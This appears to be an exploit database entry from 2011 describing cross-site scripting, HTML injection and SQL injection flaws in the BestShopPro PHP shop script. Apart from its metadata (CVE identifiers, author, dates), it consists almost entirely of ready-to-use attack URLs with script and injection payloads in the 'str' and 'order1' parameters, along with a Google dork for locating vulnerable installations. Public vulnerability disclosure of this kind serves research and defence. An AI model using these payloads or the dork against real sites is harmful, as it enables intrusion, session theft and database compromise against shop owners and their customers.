BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities

Author: CoBRa_21
type: webapps
platform: php
port: 
date_added: 2011-11-02  
date_updated: 2011-11-02  
verified: 1  
codes: OSVDB-77757;CVE-2011-4812;CVE-2011-4811;OSVDB-76880  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 18063.txt  

################################################################################################
#  Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
#
#  Author : CoBRa_21
#
#  E-Mail : uyku_cu [at] windowslive.com
#
#  Google Dork : "Powered By BST"
#
#  Script Page : http://www.bst.pl
################################################################################################
#
#  XSS:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>
#
#  HTML:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>
#
#  SQL :
#
#  http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
#
################################################################################################